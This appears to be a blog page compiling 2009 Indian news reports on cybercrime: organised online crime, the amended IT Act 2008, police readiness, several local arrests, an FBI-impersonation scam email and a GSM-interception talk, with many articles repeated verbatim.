Another report from Symantec on the ‘Underground Economy’, highlights the kind of money these cyber criminals make. According to the report, Script (a well-known figure in the underground economy) and his associates were known for mass-producing counterfeit credit and debit cards, which they delivered internationally and used to withdraw cash.
This was so efficient that, at one point, those working with Script were reportedly earning up to $100,000 a day—significantly more than estimates of earnings on US-based forums. Script was arrested by Russian authorities in 2005.
Trends in cyber crime
The last few weeks have seen cyber attacks being carried out on many countries. Just a couple of weeks ago, it was reported that a widespread and unusual computer attack was launched on Web sites of several government agencies in the United States, including some that are responsible for fighting cyber crime as well.
In addition to this the last few days saw the Web sites of major South Korean government agencies, banks and Internet sites being paralyzed in a suspected cyber attack as well.
Analysts at Symantec pointed out that many of these attacks were offline. Vishal Dhupar, MD, Symantec India said, “We observed a number of malware components that were responsible for the attacks. W32.Dozer, Trojan.Dozer, W32.Mydoom.A@mm and W32.Mytob!gen work in tandem to both spread and attack.”
All these components of the attack are basically pieces of old malware code, which were bolted together to launch the attack. If these highly unsophisticated attacks were able to create such havoc, imagine what would happen if more sophisticated and better-coordinated attacks occur!
Yuval Ben-Itzhak, CTO of Finjan, opined, “The primary trend that we see is that hackers are using automatic tools to conduct crime. These automatic tools (toolkits) enable any person with some basic IT skills to start infecting online users with data-stealing malware within hours. Data stealing malware is what these criminals are using to cash out from their activities. They are selling the data they managed to steal online.”
Dr. Jose Nazario, Manager of Security Research, Arbor Networks, Inc. added, “We have seen, just like in physical criminal world, criminals who specialize in different things, criminals who burglar houses, criminals who buy and sell stolen property, there are conmen online too. This kind of specialization has existed in the physical world for thousands of years. Now it has appeared in the online world as well. So you have division of labor, and specialization in the online crime world.”
Dr. Nazario said, “If you are able to do a complete investigation of all the various actors involved in online crime such as DDoS attacks, economic espionage, or financial fraud, there would be many different parties who are enablers at different points in the process just as the people who are enablers of a crime in the physical world.
Long-standing physical crime organizations have moved heavily into online crime as it is extremely lucrative when compared to similar efforts in the physical world and the risk of being caught is lower. Victims can be global as opposed to local in the physical world. So the vast majority of online crime today is organized crime and a big proportion of it is being committed by traditional organized criminals.”
Indian criminals learn the ropes
There are many small groups of cyber criminals in India. We have not yet seen the emergence of a cyber crime mafia. However, most small-organized groups are located either in big cities or in small towns. This phenomenon hasn’t percolated to the countryside yet.
Most of these initially began as amateur activities and after tasting success, they went ahead with other cyber criminal activities. In the metros, and in the B class cities, we have seen the emergence of data brokers or data merchants who source data from people working with offshoring or outsourcing companies like the BPOs, KPOs and LPOs. Then these brokers go ahead and process the data before selling it. This is rampant.
Pavan Duggal, Advocate, Supreme Court of India and a noted cyber lawyer, said, “Cyber crime in India is going through a learning curve of maturity. Gone are the days when Indians would indulge in petty cyber crime activities such as defacing profiles or cyber stalking. What is emerging is a professional approach towards cyber crime.”
Cyber terrorism is another challenge in India. Ankit Fadia, an independent computer security and digital intelligence consultant, who is also a cyber terrorism expert, said, “During the investigations after the Mumbai attacks it was found that the terrorists were using VoIP to do all of their planning and communications. Before the Gujarat blasts, an e-mail was sent to a few news agencies in Mumbai. Both Gujarat and Mumbai police were inadequately equipped to track who sent the e-mail etc. I was working with the Gujarat police and the Navi Mumbai cyber cell department on both of these cases and after talking to them, I realized that they weren’t properly trained.
They asked me for tools and software that are basically downloadable from the Internet and that every hacker would know about. Together with my help and that of some other security consultants, we were able to track down the e-mail but then the problem was that the e-mail was sent from a Yahoo e-mail account and when the Mumbai cyber cell and ATS contacted Yahoo, it took about four-five days for Yahoo to get back on this as they needed approvals from their US office. This is too long a time when you are working on such a critical case.”
Indian Web sites are being hacked all the time just to demonstrate the vulnerabilities of these sites. Now with cyber terrorism coming in, although cyber terrorism has been termed a heinous offence with life imprisonment as the penalty, Duggal felt that many mechanisms needed to evolve pertaining to investigation and prosecution in cyber terrorism cases. It would be far better if India had a dedicated cyber crime force. Further, cyber crime related matters have to be given a fast track court rather than go to trial, a process that drags on for years.
According to Mikko Hypponen, Chief Research Officer, F-Secure Corporation, “India is not a major source of malware or cyber crime. However, it is a major target of such crime—mostly because of its size and emphasis on high tech. In the early days of computer viruses, India used to be a big source of viruses. That was the days of hobbyist virus writers. Nowadays, the large-scale organized criminal malware attacks are coming from Russia, China and Brazil.”
That said, cyber crime is not local; it is international. The criminals are in country A, stealing money from victims in countries B, C and D through computers in countries E, F and G. In order to get the criminal arrested and sentenced, you need cooperation from the law enforcement authorities in all of these countries. That doesn’t happen as smoothly as it should.
Call for Internetpol
The Internet has no borders and online crime is almost always international, yet local police authorities often have limited resources for investigations. According to Hypponen, we should consider the creation of an online version of Interpol – ‘Internetpol’ that is specifically tasked with targeting and investigating the top of the crimeware food chain.
“I’m not holding my breath waiting for this to happen overnight. In my talks with international law enforcement, everybody agrees we need more info sharing and more co-operation. However, getting all the necessary countries on board will be hard. Then we have to take into account the possible resistance from people who think such a ‘Net police’ would be used to curb free speech or hunt peer-to-peer users when what we would really be after would be catching online criminal gangs,” Hypponen said.
According to Fadia, “An organization like an Internetpol, which is an international body that operates on a cross-border investigation, is really required. The problem that every country faces today, is that even if you get trained officials to do the investigations for a cyber crime case, if the criminal is in another country, even if the agencies have all the proof, for them to be able to contact the local police agencies in the other country to even arrest the person is nearly impossible. No international agencies like the UN or the Interpol for Internet security currently exist. Every country wants to protect their own citizens, they would never cooperate in such an investigation.”
The IT Act 2008
In order to curb cyber crime and protect the country’s sovereign interests, the government has come up with the amended IT Act 2008. Duggal believed that while the amended Act has taken two steps forward, it has taken three steps back. So, while it has increased the coverage of cyber crimes in terms of covering crimes like cyber defamation, identity theft and cyber terrorism, the majority of cyber crimes, barring a few, have been made bailable.
Duggal said, “Once a person is out on bail, as a matter of right, he will immediately go and tamper with the electronic evidence. That being so, the chances of getting convictions in the cyber crime cases would further decrease. Therefore, to that extent, it is a piece of cyber crime friendly legislation.
Already statistics are not in India’s favor. We have got only four cyber crime convictions till date, which gives you an idea of how poor the law is. I think the actually number of convictions would further recede with the new cyber act because in any cyber crime case, conviction depends upon electronic evidence and if evidence is tampered, there will be no conviction. Therefore, I think the law has gone soft on cyber criminals, except for cyber terrorism, which has been made a heinous offense.”
Duggal explained, “The amendments have deleted the term ‘hacking’ from the law. This will have a psychologically negative impact. Cyber criminals today feel that hacking has been deleted from the law. Moreover, I think this soft approach is sending out a loud message to the world is that we are not focused on cyber crime. This would certainly hurt corporate India and the rate of growth of the Indian economy. So I think it would have been far better had the government gone for stringent punishments.
The world over, post 9/11, the focus has been on increasing the quantum of punishment for cyber crime in different jurisdictions. India is the only country that has acted to the contrary and reduced punishment for cyber crimes. For e.g. Under section 67, publishing obscene electronic information was earlier punishable with five years imprisonment and a Rs. 1 lakh fine on the first conviction and 10 years imprisonment and a Rs 2 lakhs fine for the second conviction. This has now been reduced from five years to three years and from 10 to 5 years. Similarly, all other punishments have been reduced. This doesn’t make any sense.”
Government officials, however, beg to differ. According to a senior official, the quantum of punishment has not been reduced in most cases. However, he admits that most offences under the IT Act 2008 have been made bailable, but argues that this is to serve a purpose. Consider a scenario where your system is infected with a virus through the Internet or through an infected pen drive etc.
In case you send an e-mail to a company, the virus would be sent along with it and the company can press charges against you of causing harm to their systems. Though you did it unknowingly, you can be proved guilty. Now, if this offense were treated seriously with a high quantum of punishment, a large number of innocent people would get convicted. This is one reason why all many offences have been made bailable under the amended IT Act.
Another reason, for making the offences bailable pertains to the fact that due to low awareness and knowledge about technology (amongst police, lawyers as well as the judges), cyber crime related cases take a long time to resolve. In such case, many petty offenders or innocent people are treated like hardcore criminals, which isn’t fair. That being said, a lot needs to be done to educate the law enforcement agencies about technology and cyber crime.
According to Jatin Sachdeva (CISSP, CISA), Information Security Specialist, Cisco India & SAARC, “As with any law, there is a constant need to evaluate relevance and context. Even with cyber crime laws in place in so many places around the world, it has not brought about the end of cyber crime. We believe that there is definitely more that can be done, and more importantly, more stakeholders to be brought into the ecosystem.”
Plan of action
Enhancing law is one issue, then the law needs to be properly implemented. There must be an appropriate orientation and awareness of how the law needs to be applied. Then there need to be fast track courts. Another major problem is the non citizen-friendly interface of the law enforcement agencies. Getting an FIR registered is a herculean task in any cyber crime case.
It is time for India to provide for electronic FIRs. Similarly, the criminal justice system needs to be appropriately reformed in India to keep in sync with the changing realities of the electronic economy.
The Indian Computer Emergency Response Team (CERT-In) is working with state police forces to train them on cyber investigations and cyber crime. However, CERT-In has certain limitations and it is up to the state police to contact CERT-In as the latter is ready to give money for setting up cyber forensic labs.
CERT-In is also trying to educate school students about the Dos and Don’ts of the Internet and create awareness amongst them about cyber crime. This is being currently done in association with Data Security Council of India, Nasscom and Google.
Sources from the government claim that India is well prepared to face any large-scale cyber attack. The government has also prepared a cyber crisis management plan, the contents of which are classified.
When it comes to enterprise security, things come down to deploying best current practices (BCPs). From the network, server and application standpoint, there are well-known BCPs out there that network operators, server administrators, Webmasters and so forth can follow to ensure that their systems and infrastructures are hardened against attacks.
Roland Dobbins, Solution Architect, Arbor Networks, opined, “A lot of these BCPs don’t consist of most of the things that you buy so much as the things that you do in your infrastructure. It requires time and effort to implement these things and a lot of folks for various reasons are under resourced and overworked so they don’t deploy these well-known best current practices that would not only make their sites more resilient against attacks but also provide greater visibility into the attacks and mitigate them.
One of the basic things that people can do is to ensure they have a virtual team comprising of their networking staff, their sysadmins and Web and database administrators, who can be called together and can work together. Another effective thing that they need to do is that they need to have an understanding as to who are your ISPs, who’s your operational security contact who can be reached out if there is a problem.
There are lot of reports where the folks didn’t know who their SPs were and how to go about contacting them. Many SPs offer commercial DDoS mitigation services that organizations can subscribe to. These act like insurance for your systems.”
All in all, we as a country need to develop a culture of security through proper training—be it at school level, college level or at organization level. As the Chinese philosopher, Confucius rightly said, “Success depends upon previous preparation, and without such preparation there is sure to be a failure.”
Reference : http://www.expresscomputeronline.com/20090803/market01.shtml
If that doesn’t explain the state of cyber crime awareness amongst the law enforcement agencies, try reporting a cyber crime and most likely you will never think of contacting the police again for such an instance.
Today’s cyber attacks are not undertaken by amateur hackers who create viruses or malware to prove their worth or to showcase the vulnerabilities of government systems. There is a new economy emerging around cyber crime, which is sophisticated and organized.
In its Cybercrime Intelligence Report of 2009, Finjan shows the operations of the Golden Cash network consisting of an entire trading platform of malware-infested PCs. The trading platform utilizes all necessary components (buyer side, seller side, attack toolkit, and distribution via “partners”). This advanced trading platform marks a new milestone in the evolution of cyber crime.
By turning compromised PCs from a one-time source of profit into a digital asset that can be bought and sold again and again, cybercriminals are maximizing their illegal gains.
Another report from Symantec on the ‘Underground Economy’, highlights the kind of money these cyber criminals make. According to the report, Script (a well-known figure in the underground economy) and his associates were known for mass-producing counterfeit credit and debit cards, which they delivered internationally and used to withdraw cash.
This was so efficient that, at one point, those working with Script were reportedly earning up to $100,000 a day—significantly more than estimates of earnings on US-based forums. Script was arrested by Russian authorities in 2005.
Trends in cyber crime
The last few weeks have seen cyber attacks being carried out on many countries. Just a couple of weeks ago, it was reported that a widespread and unusual computer attack was launched on Web sites of several government agencies in the United States, including some that are responsible for fighting cyber crime as well.
In addition to this the last few days saw the Web sites of major South Korean government agencies, banks and Internet sites being paralyzed in a suspected cyber attack as well.
Analysts at Symantec pointed out that many of these attacks were offline. Vishal Dhupar, MD, Symantec India said, “We observed a number of malware components that were responsible for the attacks. W32.Dozer, Trojan.Dozer, W32.Mydoom.A@mm and W32.Mytob!gen work in tandem to both spread and attack.”
All these components of the attack are basically pieces of old malware code, which were bolted together to launch the attack. If these highly unsophisticated attacks were able to create such havoc, imagine what would happen if more sophisticated and better-coordinated attacks occur!
Yuval Ben-Itzhak, CTO of Finjan, opined, “The primary trend that we see is that hackers are using automatic tools to conduct crime. These automatic tools (toolkits) enable any person with some basic IT skills to start infecting online users with data-stealing malware within hours. Data stealing malware is what these criminals are using to cash out from their activities. They are selling the data they managed to steal online.”
Dr. Jose Nazario, Manager of Security Research, Arbor Networks, Inc. added, “We have seen, just like in physical criminal world, criminals who specialize in different things, criminals who burglar houses, criminals who buy and sell stolen property, there are conmen online too. This kind of specialization has existed in the physical world for thousands of years. Now it has appeared in the online world as well. So you have division of labor, and specialization in the online crime world.”
Dr. Nazario said, “If you are able to do a complete investigation of all the various actors involved in online crime such as DDoS attacks, economic espionage, or financial fraud, there would be many different parties who are enablers at different points in the process just as the people who are enablers of a crime in the physical world.
Long-standing physical crime organizations have moved heavily into online crime as it is extremely lucrative when compared to similar efforts in the physical world and the risk of being caught is lower. Victims can be global as opposed to local in the physical world. So the vast majority of online crime today is organized crime and a big proportion of it is being committed by traditional organized criminals.”
Indian criminals learn the ropes
There are many small groups of cyber criminals in India. We have not yet seen the emergence of a cyber crime mafia. However, most small-organized groups are located either in big cities or in small towns. This phenomenon hasn’t percolated to the countryside yet.
Most of these initially began as amateur activities and after tasting success, they went ahead with other cyber criminal activities. In the metros, and in the B class cities, we have seen the emergence of data brokers or data merchants who source data from people working with offshoring or outsourcing companies like the BPOs, KPOs and LPOs. Then these brokers go ahead and process the data before selling it. This is rampant.
Pavan Duggal, Advocate, Supreme Court of India and a noted cyber lawyer, said, “Cyber crime in India is going through a learning curve of maturity. Gone are the days when Indians would indulge in petty cyber crime activities such as defacing profiles or cyber stalking. What is emerging is a professional approach towards cyber crime.”
Cyber terrorism is another challenge in India. Ankit Fadia, an independent computer security and digital intelligence consultant, who is also a cyber terrorism expert, said, “During the investigations after the Mumbai attacks it was found that the terrorists were using VoIP to do all of their planning and communications. Before the Gujarat blasts, an e-mail was sent to a few news agencies in Mumbai. Both Gujarat and Mumbai police were inadequately equipped to track who sent the e-mail etc. I was working with the Gujarat police and the Navi Mumbai cyber cell department on both of these cases and after talking to them, I realized that they weren’t properly trained.
They asked me for tools and software that are basically downloadable from the Internet and that every hacker would know about. Together with my help and that of some other security consultants, we were able to track down the e-mail but then the problem was that the e-mail was sent from a Yahoo e-mail account and when the Mumbai cyber cell and ATS contacted Yahoo, it took about four-five days for Yahoo to get back on this as they needed approvals from their US office. This is too long a time when you are working on such a critical case.”
Indian Web sites are being hacked all the time just to demonstrate the vulnerabilities of these sites. Now with cyber terrorism coming in, although cyber terrorism has been termed a heinous offence with life imprisonment as the penalty, Duggal felt that many mechanisms needed to evolve pertaining to investigation and prosecution in cyber terrorism cases. It would be far better if India had a dedicated cyber crime force. Further, cyber crime related matters have to be given a fast track court rather than go to trial, a process that drags on for years.
According to Mikko Hypponen, Chief Research Officer, F-Secure Corporation, “India is not a major source of malware or cyber crime. However, it is a major target of such crime—mostly because of its size and emphasis on high tech. In the early days of computer viruses, India used to be a big source of viruses. That was the days of hobbyist virus writers. Nowadays, the large-scale organized criminal malware attacks are coming from Russia, China and Brazil.”
That said, cyber crime is not local; it is international. The criminals are in country A, stealing money from victims in countries B, C and D through computers in countries E, F and G. In order to get the criminal arrested and sentenced, you need cooperation from the law enforcement authorities in all of these countries. That doesn’t happen as smoothly as it should.
Call for Internetpol
The Internet has no borders and online crime is almost always international, yet local police authorities often have limited resources for investigations. According to Hypponen, we should consider the creation of an online version of Interpol – ‘Internetpol’ that is specifically tasked with targeting and investigating the top of the crimeware food chain.
“I’m not holding my breath waiting for this to happen overnight. In my talks with international law enforcement, everybody agrees we need more info sharing and more co-operation. However, getting all the necessary countries on board will be hard. Then we have to take into account the possible resistance from people who think such a ‘Net police’ would be used to curb free speech or hunt peer-to-peer users when what we would really be after would be catching online criminal gangs,” Hypponen said.
According to Fadia, “An organization like an Internetpol, which is an international body that operates on a cross-border investigation, is really required. The problem that every country faces today, is that even if you get trained officials to do the investigations for a cyber crime case, if the criminal is in another country, even if the agencies have all the proof, for them to be able to contact the local police agencies in the other country to even arrest the person is nearly impossible. No international agencies like the UN or the Interpol for Internet security currently exist. Every country wants to protect their own citizens, they would never cooperate in such an investigation.”
The IT Act 2008
In order to curb cyber crime and protect the country’s sovereign interests, the government has come up with the amended IT Act 2008. Duggal believed that while the amended Act has taken two steps forward, it has taken three steps back. So, while it has increased the coverage of cyber crimes in terms of covering crimes like cyber defamation, identity theft and cyber terrorism, the majority of cyber crimes, barring a few, have been made bailable.
Duggal said, “Once a person is out on bail, as a matter of right, he will immediately go and tamper with the electronic evidence. That being so, the chances of getting convictions in the cyber crime cases would further decrease. Therefore, to that extent, it is a piece of cyber crime friendly legislation.
Already statistics are not in India’s favor. We have got only four cyber crime convictions till date, which gives you an idea of how poor the law is. I think the actually number of convictions would further recede with the new cyber act because in any cyber crime case, conviction depends upon electronic evidence and if evidence is tampered, there will be no conviction. Therefore, I think the law has gone soft on cyber criminals, except for cyber terrorism, which has been made a heinous offense.”
Duggal explained, “The amendments have deleted the term ‘hacking’ from the law. This will have a psychologically negative impact. Cyber criminals today feel that hacking has been deleted from the law. Moreover, I think this soft approach is sending out a loud message to the world is that we are not focused on cyber crime. This would certainly hurt corporate India and the rate of growth of the Indian economy. So I think it would have been far better had the government gone for stringent punishments.
The world over, post 9/11, the focus has been on increasing the quantum of punishment for cyber crime in different jurisdictions. India is the only country that has acted to the contrary and reduced punishment for cyber crimes. For e.g. Under section 67, publishing obscene electronic information was earlier punishable with five years imprisonment and a Rs. 1 lakh fine on the first conviction and 10 years imprisonment and a Rs 2 lakhs fine for the second conviction. This has now been reduced from five years to three years and from 10 to 5 years. Similarly, all other punishments have been reduced. This doesn’t make any sense.”
Government officials, however, beg to differ. According to a senior official, the quantum of punishment has not been reduced in most cases. However, he admits that most offences under the IT Act 2008 have been made bailable, but argues that this is to serve a purpose. Consider a scenario where your system is infected with a virus through the Internet or through an infected pen drive etc.
In case you send an e-mail to a company, the virus would be sent along with it and the company can press charges against you of causing harm to their systems. Though you did it unknowingly, you can be proved guilty. Now, if this offense were treated seriously with a high quantum of punishment, a large number of innocent people would get convicted. This is one reason why all many offences have been made bailable under the amended IT Act.
Another reason, for making the offences bailable pertains to the fact that due to low awareness and knowledge about technology (amongst police, lawyers as well as the judges), cyber crime related cases take a long time to resolve. In such case, many petty offenders or innocent people are treated like hardcore criminals, which isn’t fair. That being said, a lot needs to be done to educate the law enforcement agencies about technology and cyber crime.
According to Jatin Sachdeva (CISSP, CISA), Information Security Specialist, Cisco India & SAARC, “As with any law, there is a constant need to evaluate relevance and context. Even with cyber crime laws in place in so many places around the world, it has not brought about the end of cyber crime. We believe that there is definitely more that can be done, and more importantly, more stakeholders to be brought into the ecosystem.”
Plan of action
Enhancing law is one issue, then the law needs to be properly implemented. There must be an appropriate orientation and awareness of how the law needs to be applied. Then there need to be fast track courts. Another major problem is the non citizen-friendly interface of the law enforcement agencies. Getting an FIR registered is a herculean task in any cyber crime case.
It is time for India to provide for electronic FIRs. Similarly, the criminal justice system needs to be appropriately reformed in India to keep in sync with the changing realities of the electronic economy.
The Indian Computer Emergency Response Team (CERT-In) is working with state police forces to train them on cyber investigations and cyber crime. However, CERT-In has certain limitations and it is up to the state police to contact CERT-In as the latter is ready to give money for setting up cyber forensic labs.
CERT-In is also trying to educate school students about the Dos and Don’ts of the Internet and create awareness amongst them about cyber crime. This is being currently done in association with Data Security Council of India, Nasscom and Google.
Sources from the government claim that India is well prepared to face any large-scale cyber attack. The government has also prepared a cyber crisis management plan, the contents of which are classified.
When it comes to enterprise security, things come down to deploying best current practices (BCPs). From the network, server and application standpoint, there are well-known BCPs out there that network operators, server administrators, Webmasters and so forth can follow to ensure that their systems and infrastructures are hardened against attacks.
Roland Dobbins, Solution Architect, Arbor Networks, opined, “A lot of these BCPs don’t consist of most of the things that you buy so much as the things that you do in your infrastructure. It requires time and effort to implement these things and a lot of folks for various reasons are under resourced and overworked so they don’t deploy these well-known best current practices that would not only make their sites more resilient against attacks but also provide greater visibility into the attacks and mitigate them.
One of the basic things that people can do is to ensure they have a virtual team comprising of their networking staff, their sysadmins and Web and database administrators, who can be called together and can work together. Another effective thing that they need to do is that they need to have an understanding as to who are your ISPs, who’s your operational security contact who can be reached out if there is a problem.
There are lot of reports where the folks didn’t know who their SPs were and how to go about contacting them. Many SPs offer commercial DDoS mitigation services that organizations can subscribe to. These act like insurance for your systems.”
All in all, we as a country need to develop a culture of security through proper training—be it at school level, college level or at organization level. As the Chinese philosopher, Confucius rightly said, “Success depends upon previous preparation, and without such preparation there is sure to be a failure.”
Reference : http://www.expresscomputeronline.com/20090803/market01.shtml
Kandivli businessman in connection with a cheating and hacking case
The cyber crime cell of the Bangalore police last week arrested a Kandivli businessman in connection with a cheating and hacking case registered there.
The accused, Yashwant Mairale (39), is a resident of Kandivli. Mumbai police sources confirmed that they assisted the Bangalore team, headed by S S Muddegowda, which had come in search of Mairale. He was produced before the Ballard Pier court by the Bangalore cops, seeking his transfer warrant. He will be produced before the first class magistrate court i Bangalore on Friday.
The case pertains to a complaint of cheating by S Rangaswamy, a resident of Bangalore, who alleged that some one had hacked into his ICICI e-banking account and stolen Rs 2.50 lakh. When he checked the account in December last year, he was shocked to discover that Rs 2.50 lakh was transferred into three accounts.
A case of cheating was registered by the Cantonment police. But as it pertained to a hacking offence, the case was transferred to the CID’s cyber cell. During investigations, the police found that one of the beneficiaries, Sukresh Das, had an account the SBI’s branch in West Bengal.
But the police were unable to trace any such person. However, they found that Rs 50,000 was transferred into Mairale’s account in Mumbai
The accused, Yashwant Mairale (39), is a resident of Kandivli. Mumbai police sources confirmed that they assisted the Bangalore team, headed by S S Muddegowda, which had come in search of Mairale. He was produced before the Ballard Pier court by the Bangalore cops, seeking his transfer warrant. He will be produced before the first class magistrate court i Bangalore on Friday.
The case pertains to a complaint of cheating by S Rangaswamy, a resident of Bangalore, who alleged that some one had hacked into his ICICI e-banking account and stolen Rs 2.50 lakh. When he checked the account in December last year, he was shocked to discover that Rs 2.50 lakh was transferred into three accounts.
A case of cheating was registered by the Cantonment police. But as it pertained to a hacking offence, the case was transferred to the CID’s cyber cell. During investigations, the police found that one of the beneficiaries, Sukresh Das, had an account the SBI’s branch in West Bengal.
But the police were unable to trace any such person. However, they found that Rs 50,000 was transferred into Mairale’s account in Mumbai
Accused Anand Bilore created a fake profile of his workmate on the social networking site, and sent obscene messages from it to female colleagues in t
With internet users becoming aware about email scams, fraudsters have upped their game and are using ingenious methods to extract money from unsuspecting netizens.
The latest fraud email doing the rounds lists the Federal Bureau of Investigation (FBI) as the sender. The email offers to refund money you may have lost in an internet fraud in the past. But don’t hit the ‘reply’ button with your personal details. All these emails are fake. To make the emails look authentic, the fraudsters have provided the address of the FBI headquarters at Washington DC along with the investigating department. The National Association of Software and Service Companies (Nasscom) has written to the FBI, asking the agency to look into the matter.
The email is written by one Thomas Green who claims to be an agent with the FBI’s Internet Crime Complaint Center. The email states that six people have been arrested in connection with an email fraud, where they duped recipients into parting with money. A part of the amount, approximately US $ 2.5 lakh, has been recovered and can be refunded to the fraud victims through an ATM card, the email states. The card will be dispatched after the recipient provides personal information to another agent, Fredy Simon,the email adds.
“A month ago, I received a similar email, where the sender said he represented the United Nations and a committee had been created to refund money to victims of a phishing fraud. The email carried the UN logo and pictures of the secretary-general,’’ said technology evangelist Vijay Mukhi. “It’s best to delete such emails,” he added.
“This is a variation of the Nigerian scam,’’ said Pratap Reddy, director of cyber security at Nasscom. “If you haven’t lodged a police complaint, there’s no question of being contacted by an agency. If a complaint has been lodged, then a foreign agency like the FBI will have to go through proper diplomatic channels such as the Interpol. State CID is the nodal agency that would co-ordinate. The FBI will never approach an Indian citizen directly,’’ Reddy added.
The latest fraud email doing the rounds lists the Federal Bureau of Investigation (FBI) as the sender. The email offers to refund money you may have lost in an internet fraud in the past. But don’t hit the ‘reply’ button with your personal details. All these emails are fake. To make the emails look authentic, the fraudsters have provided the address of the FBI headquarters at Washington DC along with the investigating department. The National Association of Software and Service Companies (Nasscom) has written to the FBI, asking the agency to look into the matter.
The email is written by one Thomas Green who claims to be an agent with the FBI’s Internet Crime Complaint Center. The email states that six people have been arrested in connection with an email fraud, where they duped recipients into parting with money. A part of the amount, approximately US $ 2.5 lakh, has been recovered and can be refunded to the fraud victims through an ATM card, the email states. The card will be dispatched after the recipient provides personal information to another agent, Fredy Simon,the email adds.
“A month ago, I received a similar email, where the sender said he represented the United Nations and a committee had been created to refund money to victims of a phishing fraud. The email carried the UN logo and pictures of the secretary-general,’’ said technology evangelist Vijay Mukhi. “It’s best to delete such emails,” he added.
“This is a variation of the Nigerian scam,’’ said Pratap Reddy, director of cyber security at Nasscom. “If you haven’t lodged a police complaint, there’s no question of being contacted by an agency. If a complaint has been lodged, then a foreign agency like the FBI will have to go through proper diplomatic channels such as the Interpol. State CID is the nodal agency that would co-ordinate. The FBI will never approach an Indian citizen directly,’’ Reddy added.
Jealous colleague turns to Orkut for revenge, arrested
Accused Anand Bilore created a fake profile of his workmate on the social networking site, and sent obscene messages from it to female colleagues in the company
There is nothing called healthy competition at the workplace. Especially if at stake is a coveted ‘best employee’ award, a promotion and the promise of a better life.
Allegedly driven by professional jealousy, an assistant manager with Kotak Life Insurance created a fake Orkut profile of his colleague with the intention of discrediting him. Thane’s Cyber Crime Cell arrested him and his associate on Tuesday after he used the social networking profile to send obscene messages to the female colleagues. The accused, Anand Ishwar Bilore, 21, and his associate, Vishal Changani, 23, an estate agent are from Chembur.
A Cyber Crime Cell officer said, “Bilore was working with the insurance company for the last couple of years while Nirmale joined only recently. Nirmale’s meteoric rise in the organisation obviously did not go down well with Bilore, especially after he won the best employee award and was promoted to the post of assistant manager.”
In order to embarrass his colleague, Bilore allegedly created his fake profile on Orkut from his friend Changani’s computer,” said Chandrakant Joshi, senior police inspector of the Cyber Cell.
“The accused scrapped all his female employees in the organisation and also sent them vulgar messages. When the women cross-checked with Nirmale he clarified his stand and lodged a complaint,” Joshi added.
Nirmale’s father Balasaheb said, “My son was upset when his female colleagues complained to him about the lurid messages. He was doing well at work, which I think upset Bilore as he belonged to a rival clique.”
On investigating, the police discovered that the computer belonged to Changani who was then arrested. Changani then informed the police about Bilore’s involvement.
Both were booked under Information Technology Act and were let off on bail.
“Strict disciplinary action is being taken against the erring individual. We place high emphasis on ethical conduct in personal and professional dealings of employees and misdemeanors of any sort are not tolerated,” said Sugata Dutta, Head of Human Resources, Kotak Life Insurance.
There is nothing called healthy competition at the workplace. Especially if at stake is a coveted ‘best employee’ award, a promotion and the promise of a better life.
Allegedly driven by professional jealousy, an assistant manager with Kotak Life Insurance created a fake Orkut profile of his colleague with the intention of discrediting him. Thane’s Cyber Crime Cell arrested him and his associate on Tuesday after he used the social networking profile to send obscene messages to the female colleagues. The accused, Anand Ishwar Bilore, 21, and his associate, Vishal Changani, 23, an estate agent are from Chembur.
A Cyber Crime Cell officer said, “Bilore was working with the insurance company for the last couple of years while Nirmale joined only recently. Nirmale’s meteoric rise in the organisation obviously did not go down well with Bilore, especially after he won the best employee award and was promoted to the post of assistant manager.”
In order to embarrass his colleague, Bilore allegedly created his fake profile on Orkut from his friend Changani’s computer,” said Chandrakant Joshi, senior police inspector of the Cyber Cell.
“The accused scrapped all his female employees in the organisation and also sent them vulgar messages. When the women cross-checked with Nirmale he clarified his stand and lodged a complaint,” Joshi added.
Nirmale’s father Balasaheb said, “My son was upset when his female colleagues complained to him about the lurid messages. He was doing well at work, which I think upset Bilore as he belonged to a rival clique.”
On investigating, the police discovered that the computer belonged to Changani who was then arrested. Changani then informed the police about Bilore’s involvement.
Both were booked under Information Technology Act and were let off on bail.
“Strict disciplinary action is being taken against the erring individual. We place high emphasis on ethical conduct in personal and professional dealings of employees and misdemeanors of any sort are not tolerated,” said Sugata Dutta, Head of Human Resources, Kotak Life Insurance.
CYBER COPS CRACK RS 65K FRAUD
Duo hacks website, books int’l tickets
Mumbai: Two persons hacked into the website of an authorised travel agent of a domestic airline, causing a loss of more than Rs 65,000 to the latter. But their fraud was detected and they ended up in the police net.
The two hacked into the website of an Andheri travel agent of Indigo Airlines. They booked international tickets that caused a loss to Indigo Airlines to the tune of 65,152. However, the duo was nabbed by the cyber police on Tuesday. The two accused, who have been identified as Prashant Amarnarayan Jha (36) and Sudipkumar Sinha (30), have been booked on the charges of Information Technology Act of 2000 and have been remanded to police custody. While Jha is a resident of Nallasopara, Sinha is his associate and a resident of Marol in Andheri.
According to the police, the complaint was filed by one Arun Shetty who is the authorised ticket agent of Indigo Airlines having an office under the name of Ramkrishna Travels and Tours in Andheri.
Shetty was shocked recently when the airlines furnished him the extra bill for a few international tickets which he had not issued. During the course of investigations, it came to light that somebody had hacked into the website of the travel agent and issued two international air tickets. The cyber police traced the IP address to Nalasopara. The police raided Jha’s residence and arrested him.
Mumbai: Two persons hacked into the website of an authorised travel agent of a domestic airline, causing a loss of more than Rs 65,000 to the latter. But their fraud was detected and they ended up in the police net.
The two hacked into the website of an Andheri travel agent of Indigo Airlines. They booked international tickets that caused a loss to Indigo Airlines to the tune of 65,152. However, the duo was nabbed by the cyber police on Tuesday. The two accused, who have been identified as Prashant Amarnarayan Jha (36) and Sudipkumar Sinha (30), have been booked on the charges of Information Technology Act of 2000 and have been remanded to police custody. While Jha is a resident of Nallasopara, Sinha is his associate and a resident of Marol in Andheri.
According to the police, the complaint was filed by one Arun Shetty who is the authorised ticket agent of Indigo Airlines having an office under the name of Ramkrishna Travels and Tours in Andheri.
Shetty was shocked recently when the airlines furnished him the extra bill for a few international tickets which he had not issued. During the course of investigations, it came to light that somebody had hacked into the website of the travel agent and issued two international air tickets. The cyber police traced the IP address to Nalasopara. The police raided Jha’s residence and arrested him.
Tap mobiles with a $1,500 device now
A COMPUTER SECURITY RESEARCHER has built a device for just $1,500 that can intercept some kinds of cell phone calls and record everything that’s said.
The attack Chris Paget showed illustrates weaknesses in GSM, one of the world’s most widely-used cellular communications technologies. His attack was benign; he showed how he could intercept a few dozen calls made by fellow hackers in the audience for his talk at the Defcon conference here.
But it illustrates that criminals could do the same thing for malicious purposes, and that consumers have few options for protecting themselves.
Paget said he hopes his research helps spur adoption of newer communications standards that are more secure.
